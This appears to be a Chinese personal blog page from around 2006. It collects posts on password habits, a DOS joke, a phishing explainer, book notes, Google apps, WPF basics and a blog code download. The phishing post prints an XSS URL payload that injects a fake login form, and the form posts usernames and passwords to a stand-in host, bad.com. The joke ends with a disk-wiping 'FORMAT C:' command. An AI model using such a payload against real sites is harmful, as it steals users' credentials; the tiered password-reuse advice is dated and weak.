如何管理网络密码

这是一个数字化时代,也是一个数字泛滥的时代,大多数人为了解救糟糕的记忆,奉行着邮箱密码统一化、银行密码统一化甚至是所有密码统一化的原则,其实这实在很危险。


想像一下并不是所有要你验证密码的网站,其本身肯定是安全的,网站管理员也许能很轻易的就搞到你的密码。


在管理网络账号和密码时要注意以下三点:


1.不要统一账号和密码


2.不要将账号和密码写在纸上


3.不要用生日


为了遍于记忆,也不能让密码越来越多,所以最好的方式是能够按照网站的安全等级,准备三组密码:


密码1:包含财务信息(网上银行、淘宝、paypal…),密码长度必需8位以上,而且包含英文字母或符号


密码2:包含个人隐私(电子邮件…),8位以上密码长度


密码3:普通网站(BBS…),6位以上密码长度


其实最安全的方式是每个账号都使用随机的密码,困难是不好记忆。解决的方法是用软件帮忙:Password Minder ,这个软件可以管理所有的账号信息,随机生成密码,备份密码信息到加密的文件,只是每次使用要输入一个至少12位的密码有点麻烦。



Podcast “Security Now!” 上的 Episode #4 和 #5 专门讨论了 Personal Password Policy,从policy的角度详细的叙述了密码保护的内容。
里面的有一个观点我很认同,一个普通网站最安全的密码操作方式是:当用户注册后,将随机生成的密码发到用户的注册邮箱,用户用这个随机密码登录,并将账号密码信息保存在邮箱中。

智能电脑

以前有个笑话:



男朋友买了块电视卡,装在电脑上看电视的。正好女朋友来玩,男友就在她面前演示了一番, 女友用崇拜的语气说:” 你好厉害,电脑都能看电视啊? “
“小意思啦!”
“你好棒啊,我也要玩!”
“好啊!你先玩,我给你拿饮料去。”


等男朋友回来,发现女朋友不见了 ,电脑萤幕却留下了一堆字:


C:电视


Bad command or file name


C:看电视


Bad command or file name


C:开电视


Bad command or file name


C:打开电视


Bad command or file name


C:电视开


Bad command or file name


C:开


Bad command or file name


C:我要看电视


Bad command or file name


C:我要看中央6


Bad command or file name


C:卫视中文


Bad command or file name


C: ……我要看电视啦!


Bad command or file name


C:我火大罗


Bad command or file name


C:到底给不给看ㄚ


Bad command or file name


C:@!$!$!$!~!@~!#~~%%@^@$^@$^$^


Bad command or file name


C:臭电视


Bad command or file name


C:以後不跟你玩了


Bad command or file name


C:唉呦…拜托啦…开一下


Bad command or file name


C:真的不开


Bad command or file name


C:真的….


Bad command or file name


C:好…给我记住…


Bad command or file name


C:FORMAT C:


如果说十年前的dos系统让人觉得机械而且愚钝,那么下面这个视频里面演示的下一代系统windows vista中的语音识别技术也许会让你目瞪口呆的。


http://channel9.msdn.com/Showpost.aspx?postid=169124



phishing

cross-site scripting 最直接的危害就是“phishing”,所以写篇文章来介绍一下这个新词汇。


什么是 phishing?



phishing是一种把社会工程和技术手段兼而用之,偷取消费者个人身份信息和财务帐户信息的手段。


如何 phishing?


点击放大


phish 的示例代码


http://www.good.com/index.asp?info=<form method=”POST” name=”Form1″><div style=”position:absolute;top:1024;left:1024;”><table cellpadding=”5″ cellspacing=”5″ width=”400″ bgcolor=”white” height=”300″><tr><td valign=”top”><p><p><p><BR><b><font color=”red”>Please Login and update your phone number.</font><BR>We cannot complete your order until your current phone number is on record.</font></b><br><br><b>User Login</b><br><br><b>Username:</b><BR><input type=”text” id=”UserName” name=”UserName”><P><B>Password:</b><BR><input type=”password” id=”UserPassword” name=”UserPassword”><P><input type=”button” value=”Login” onclick=”document.Form1.action=’http://www.bad.com’;submit();”></td></tr></table></div></form>


相关链接


Anti-Phishing Working Group


小心”网络钓鱼”邮件

Books, Googles & Events

Books:

上周在美罗城上面的大众书局一目十几行的翻了两本书

一本是孙正义的传记,放在进门很显著的位置,书的包装和纸张很好,序言则是长得离谱,从名字(《互联网造梦人的光荣与梦想:飞得更高》)上看就猜得到是一本很青春励志的书。有件事情我算是终于搞清楚了,原来孙正义是祖籍中国的韩国人,娶了日本妻子后入了日本籍。

另外一本是高建华的《笑着离开惠普: 揭密惠普》,看名字还以为是要曝什么内幕,不过实际上是讲惠普的人性化管理,本地化的惠普之道(HP Way)。作者在惠普的经历挺有意思的,三进三出惠普,第一次离开因为跳槽去苹果电脑,第二次离开因为惠普拆出了安捷伦,第三次离开惠普后作者专职从事管理讲师。
书里作者写了这样一句话:员工离开,并不是一种对公司的背叛。
我记得我去年刚进入惠普的时候,我的manager找我谈话的时候也说到过:不能说你会一直呆在惠普,但希望你离开的时候觉得在惠普学到了很多。

Googles:

Google的两个新的在线应用,很喜欢

Markup star, edit label 和 keep unread 的功能很喜欢。

刚刚在public calendar里面搜索 ‘World Cup’ ,加到了自己的日历里面了,挺不错的。
同样是AJAX的在线日历,Google Calendar的用户体验就是要比Calendar Hub好很多,很多人应该会和我一样放弃先出来的后者选择后出来的前者,再次证明用户体验的重要性。

Events:

可以去看看的两个展览:

国家地理百年经典中国巡展(上海)2006年4月15日—5月7日
http://www.duolunart.com/exhibitions_&_events/upcoming_meiguoguojiadili.htm

上海杜莎夫人蜡像馆 2006年六月
http://www.madame-tussauds.com.cn/

WPF基础概念

对几个重要概念的理解:


DataTemplate: 用binding语句,将一个具体的数据对象 转换成一组 UI控件来表示,并绑定到上层的控件中。


ControlTemplate: 用TargetType属性,将该类的控件用一组其它的图形或UI控件来展现,其Triggers属性可以用来定义动画效果。


Style: 可以对某类控件设置属性,并在该类控件被调用时指定该控件应用的Style。


推荐网站:http://www.beacosta.com/ (关于WPF DataBinding)

blog程序的代码下载

发布这个blog的代码,今年写的,参考了wordpress和Gmail的结构。

Code Name: GC

运行环境: PHP 4 + MySQL 4

优点:界面简洁,部分支持AJAX,支持自由的tag方式

缺点:略

截图

1. 前台显示界面

2. 后台管理界面

版权:署名、非商业性使用、相同方式共享

FAQ:见代码包中《安装说明.txt》

代码下载